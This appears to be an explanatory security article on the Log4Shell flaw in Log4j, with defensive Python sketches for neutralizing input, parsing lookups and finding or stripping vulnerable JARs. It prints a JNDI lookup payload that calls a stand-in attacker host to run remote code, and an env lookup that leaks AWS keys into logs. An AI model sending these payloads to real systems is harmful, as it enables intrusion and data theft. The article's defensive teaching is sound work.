It was a dangerous bug in a popular open-source Java programming toolkit called Log4j (short for “Logging for Java”), published by the Apache Software Foundation under a liberal, free source code license.
If you’ve ever written software of any sort, from the simplest BAT file on a Windows laptop to the gnarliest mega-application running on a whole rack of servers, you’ll have used logging commands.
From basic output such as echo "Starting calculations (this may take a while)" printed to the screen, all the way to formal messages saved in a write-once database for auditing or compliance reasons, logging is a vital part of most programs, especially when something breaks and you need a clear record of exactly how far you got before the problem hit.
The Log4Shell vulnerability (actually, it turned out there were several related problems, but we’ll treat them all as if they were one big issue here, for simplicity) turned out to be half-bug, half-feature.
In other words, Log4j did what it said in the manual, unlike in a bug such as a buffer overflow, where the offending program incorrectly tries to mess around with data it promised it would leave alone…
… But unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of careful input verification on top of Log4j, your software could come unstuck.
Really, badly, totally unstuck.
Interpolation considered harmful
Simply put, Log4j did not always record log messages exactly as you supplied them.
Instead, it had a “feature” known variously and confusingly in the jargon as interpolation, command substitution or auto-rewriting, so that you could trigger text manipulation features inside the logging utility itself, without having to write special code of your own to do it.
For example, the text in the INPUT column below would get logged literally, exactly as you see it, which is probably what you’d expect from a logging toolkit, especially if you wanted to keep a precise record of the input data your users presented for regulatory reasons:
INPUT                        OUTCOME
------------------------     ------------------------
USERNAME=duck             -> USERNAME=duck
Caller-ID:555-555-5555    -> Caller-ID:555-555-5555
Current version = 17.0.1  -> Current version = 17.0.1
But if you submitted text wrapped in the magic character sequence ${...}, the logger would sometimes do smart things with it, after receiving the text but before actually writing it into the logfile, like this:
INPUT                                 OUTCOME
----------------------------------    -------------------------------------------
CURRENT=${java:version}/${java:os} -> CURRENT=Java version 17.0.1/Windows 10 10.0
Server account is: ${env:USER}     -> Server account is: root
${env:AWS_ACCESS_KEY_ID}           -> SECRETDATAINTENDEDTOBEINMEMORYONLY
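To make the mechanism concrete, here is a toy model of this sort of lookup-style rewriting. It is an illustration only, not Log4j's actual code: the function name interpolate, the regular expression, and the decision to support just the env prefix are all assumptions made for the sketch, which also assumes the ${prefix:key} syntax.

```python
import os
import re

# Toy model only: this is NOT how Log4j is implemented. It recognises
# patterns of the form ${prefix:key} and rewrites the ones it understands.
LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")

def interpolate(message, env=None):
    """Return message with ${env:NAME} patterns replaced by environment values."""
    env = os.environ if env is None else env

    def resolve(match):
        prefix, key = match.group(1), match.group(2)
        if prefix == "env":
            # The logger, not the caller, decides what ends up in the logfile.
            return env.get(key, "")
        # Lookups this toy does not understand are left exactly as written.
        return match.group(0)

    return LOOKUP.sub(resolve, message)

# A made-up environment, so the example never touches real secrets.
fake_env = {"USER": "root", "AWS_ACCESS_KEY_ID": "SECRETDATAINTENDEDTOBEINMEMORYONLY"}
print(interpolate("USERNAME=duck", fake_env))                   # USERNAME=duck
print(interpolate("Server account is: ${env:USER}", fake_env))  # Server account is: root
print(interpolate("${env:AWS_ACCESS_KEY_ID}", fake_env))        # SECRETDATAINTENDEDTOBEINMEMORYONLY
```

The point to notice is that the caller passes in one string and a different string is what gets recorded, with the rewriting driven entirely by the content of the input.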
Clearly, if you’re accepting logging text from a trusted source, where it’s reasonable to allow the loggee to control the logger by telling it to replace plain text with internal data, this sort of text rewriting is useful.
But if your goal is to keep track of data submitted by a remote user, perhaps for regulatory record-keeping purposes, this sort of auto-rewriting is doubly dangerous:
- In the event of a dispute, you do not have a reliable record of what the user actually did submit, given that it might have been modified between input and output.
- A malicious user could send sneakily-constructed inputs in order to provoke your server into doing something it was not supposed to.
If you’re logging user inputs such as their browser identification string (known in the jargon as the User-Agent), or their username or phone number, you do not want to give the user a chance to trick you into writing private data (such as a memory-only password string like the AWS_ACCESS_KEY_ID in the example above) into a permanent logfile.
Especially if you’ve confidently told your auditors or the regulator that you never write plaintext passwords into permanent storage. (You should not do this, even if you have not officially told the regulator you do not!)
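One way to add your own layer of input verification is to encode untrusted text before it ever reaches the logger, so that no ${...} sequence survives for the logger to act on. The sketch below is a hypothetical helper, not part of Log4j or of any official mitigation, and it is no substitute for patching. It percent-encodes the characters $, {, } and %, plus anything unprintable, which keeps the record reversible so you can still recover exactly what the user sent.

```python
from urllib.parse import unquote

def neutralize(value):
    """Percent-encode lookup metacharacters and unprintable characters.

    Hypothetical helper for illustration. '%' itself is encoded too, so that
    urllib.parse.unquote() restores the original text exactly.
    """
    out = []
    for ch in value:
        if ch in "$%{}" or not ch.isprintable():
            # Encode each UTF-8 byte of the character as %XX.
            out.append("".join(f"%{b:02X}" for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)

user_agent = "${jndi:ldap://dodgy.server.example:8888/BadThing}"
safe = neutralize(user_agent)
print(safe)                         # %24%7Bjndi:ldap://dodgy.server.example:8888/BadThing%7D
print(unquote(safe) == user_agent)  # True
```

Encoding newlines as well stops a user from forging extra log lines, and the reversibility addresses the record-keeping concern: the logfile no longer contains the raw text, but the raw text can always be reconstructed from it.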
Worse to come
In the Log4Shell is-it-a-bug-or-is-it-a-feature case, however, things were much worse than the already-risky examples we’ve shown above.
For example, a user who deliberately submitted data like the input shown below could trigger a truly dangerous sequence of events:
INPUT                                                OUTCOME
-------------------------------------------------    ----------------------------------------
${jndi:ldap://dodgy.server.example:8888/BadThing} -> Download and run a remote Java program!?
In the “interpolation” string above, the ${...} character sequence that includes the abbreviations jndi and ldap told Log4j to do this:
- Use the Java Naming and Directory Interface (JNDI) to locate the server dodgy.server.example.
- Connect to that server via LDAP, using TCP port 8888.
- Request the data stored in the LDAP object BadThing.
In other words, attackers could submit specially-crafted input that would instruct your server to “call home” to a server under their control, without so much as a by-your-leave.
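The way the pieces of such a string map onto those steps can be sketched by pulling the lookup apart. This is an illustration of how to read the string, not of how Log4j parses it; the function name and regular expression are assumptions, and a pattern this simple would not make a reliable attack detector, because real-world attack strings were often disguised with nested lookups.

```python
import re
from urllib.parse import urlsplit

# Matches the plain, undisguised form ${jndi:<url>} only.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([^}]+)\}", re.IGNORECASE)

def describe_jndi_lookup(text):
    """Return (protocol, host, port, object_name) for the first lookup, or None."""
    match = JNDI_LOOKUP.search(text)
    if match is None:
        return None
    url = urlsplit(match.group(1))
    # scheme   -> which directory protocol to speak (here, LDAP)
    # hostname -> the server to locate and connect to
    # port     -> the TCP port to use
    # path     -> the name of the object to request
    return (url.scheme, url.hostname, url.port, url.path.lstrip("/"))

print(describe_jndi_lookup("${jndi:ldap://dodgy.server.example:8888/BadThing}"))
# ('ldap', 'dodgy.server.example', 8888, 'BadThing')
```

Every field in that result was chosen by whoever submitted the text, which is what makes the lookup so dangerous when the text comes from outside.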
How could this be a “feature”?
You might be wondering how a “feature” like this ever made it into the Log4j code.
But this sort of text rewriting can be useful, as long as you’re logging data from a trusted source.
For example, you could log a numerical user ID, but also ask the logger to use LDAP (the lightweight directory access protocol, widely used in the industry, including by Microsoft’s Active Directory system) to retrieve and save the username associated with that account number at that time.
This would improve both the readability and the historical value of the entry in the logfile.
But the LDAP server that Log4j called out to in the example above (which was chosen by the remote user, do not forget) is unlikely to know the truth, let alone to tell it, and a malicious user could therefore use this trick to fill up your logs with bogus and even legally dubious data.
Even worse, the LDAP server could return precompiled Java code for generating the data to be logged, and your server would dutifully run that program: an unknown program, supplied by an untrusted server, chosen by an untrusted user.
Loosely speaking, if any server, anywhere in your network, logged untrusted input that had come in from outside, and used Log4j to do so…
… Then that input could be used as a direct and immediate way to trick your server into running someone else’s code, just like that.
That’s called RCE in the jargon, short for remote code execution, and RCE bugs are generally the most keenly sought by cybercriminals because they can typically be exploited to implant malware automatically.
Unfortunately, the nature of this bug meant that the danger was not limited to internet-facing servers, so using web servers that were written in C rather than Java (e.g. IIS, Apache httpd, nginx), and that therefore did not themselves use the buggy Log4j code, did not free you from risk.
In theory, any back-end Java app that received and logged data from elsewhere on your network, and that used the Log4j library…
… Could potentially be reached and exploited by outside attackers.
The fix was pretty straightforward:
- Find old versions of Log4j anywhere and everywhere in your network. Java modules typically have names like log4j-core-X.Y.Z.jar, where X.Y.Z is the version number and jar is short for Java archive, a specially-structured sort of ZIP file. With a searchable prefix, a definitive extension, and the version number embedded in the filename, quickly finding offending files with “the wrong” versions of Java library code is actually fairly easy.
- Replace the buggy versions with newer, patched ones.
- If you were not in a position to change Log4j version, you could reduce or remove the risk by removing a single code module from the buggy Log4j package (the Java code that handled JNDI lookups, as described above), and repackaging your own slimmed-down JAR file with the bug suppressed.
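The first and last of those steps can be sketched in a few lines. This is a rough illustration under stated assumptions, not a complete scanner: it assumes the library file follows the usual log4j-core-X.Y.Z.jar naming, so it will miss renamed files, versions that are not in three-part numeric form, and copies of Log4j bundled inside other archives. The function names are hypothetical, and the minimum acceptable version is deliberately left as a parameter for you to set from Apache's current security advisories.

```python
import re
import zipfile
from pathlib import Path

# Assumptions: the standard log4j-core filename pattern, and the location of
# the JNDI lookup class inside a normally packaged log4j-core JAR.
JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def find_old_log4j(root, minimum_version):
    """Yield (path, version) for log4j-core JARs older than minimum_version.

    minimum_version is a tuple such as (2, 17, 1), chosen by the caller.
    """
    for path in Path(root).rglob("log4j-core-*.jar"):
        match = JAR_NAME.match(path.name)
        if match:
            version = tuple(int(part) for part in match.groups())
            if version < minimum_version:
                yield path, version

def strip_jndi_lookup(src, dst):
    """Copy the JAR at src to dst without the JNDI lookup class.

    Returns True if the class was present and has been left out.
    """
    removed = False
    with zipfile.ZipFile(src) as old, \
         zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as new:
        for item in old.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            # Everything else is copied across unchanged.
            new.writestr(item, old.read(item.filename))
    return removed
```

Looping over find_old_log4j("/opt/apps", (2, 17, 1)) would list the candidates under a directory tree; both the path and the version threshold there are placeholders. Writing the slimmed-down archive to a new file, rather than editing in place, leaves the original untouched in case you need to roll back.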
The saga continues
Unfortunately, a recent, detailed report on the Log4Shell saga, published last week by the US Cyber Safety Review Board (CSRB), part of the Department of Homeland Security, contains the worrying suggestion that:
[T]he Log4j event is not over. The [CSRB] assesses that Log4j is an “endemic vulnerability” and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.
What to do?
At 42 pages (the executive summary alone runs to nearly three pages), the Board’s report is a long document, and parts of it are heavy going.
But we recommend that you read it through, because it’s a fascinating tale of how even cybersecurity problems that ought to be quick and easy to fix can get ignored, or put off until later, or as-good-as denied altogether as “someone else’s problem” to fix.
Notable suggestions from the US public service, which we wholeheartedly endorse, include:
- Develop the capacity to maintain an accurate information technology (IT) asset and application inventory.
- [Set up a] documented vulnerability response program.
- [Set up a] documented vulnerability disclosure and handling process.
When it comes to cybersecurity, ask not what everyone else can do for you…
… But think about what you can do for yourself, because any improvements you make will almost certainly benefit everyone else as well.